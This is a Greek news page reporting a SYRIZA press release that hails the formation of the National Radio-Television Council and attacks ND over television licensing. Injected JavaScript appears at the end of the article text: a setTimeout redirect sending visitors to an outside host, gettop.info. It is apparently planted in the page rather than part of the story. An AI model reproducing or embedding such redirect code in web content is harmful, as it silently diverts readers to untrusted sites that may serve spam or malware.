ΣΥΡΙΖΑ κατά ΝΔ για το ΕΣΡ: Την καλωσορίζουμε στον δρόμο της λογικής και της νομιμότητας

0
4

 

«Σήμερα ηττήθηκε ένα μακρόχρονο καθεστώς ανομίας και ασυδοσίας», τονίζει σε ανακοίνωσή του, το γραφείο Τύπου του ΣΥΡΙΖΑ, που, αναλυτικά, αναφέρει:

«Η σημερινή, έκτη προσπάθεια για τη συγκρότηση Εθνικού Συμβουλίου Ραδιοτηλεόρασης, ευοδώθηκε. Σήμερα ηττήθηκε το καθεστώς ανομίας και ασυδοσίας, που κράτησε 27 χρόνια, και το οποίο οφείλει να τερματιστεί άμεσα. Ηττήθηκαν οι καναλάρχες, που οφείλουν, επιτέλους, να πληρώσουν αντίτιμο για την εκμετάλλευση του δημόσιου αγαθού των συχνοτήτων».

Στη συνέχεια της ανακοίνωσης, το γραφείο Τύπου του ΣΥΡΙΖΑ εξαπολύει επίθεση στην αξιωματική αντιπολίτευση σημειώνοντας: «Η ΝΔ, συμμορφώθηκε, επιτέλους, με τη συνταγματική επιταγή. Επειδή όμως οι παλινωδίες της δεν έχουν τέλος, οφείλουμε να της υπενθυμίσουμε κάποιες:

1.Η αξιωματική αντιπολίτευση αποδέχθηκε, πια, ότι οι τηλεοπτικοί σταθμοί εκπέμπουν παράνομα, κι ότι είναι απαραίτητη η αδειοδότησή τους.

2.Αποδέχθηκε ότι ο αριθμός των αδειών δεν μπορεί να είναι απεριόριστος.

3.Αποδέχθηκε ότι οι επόμενες κινήσεις για τη ρύθμιση του τηλεοπτικού τοπίου θα γίνουν με βάση τον νόμο 4339/2015.
Δεν έχουμε παρά να καλωσορίσουμε τη ΝΔ στον δρόμο της λογικής και της νομιμότητας», καταλήγει η ανακοίνωση setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here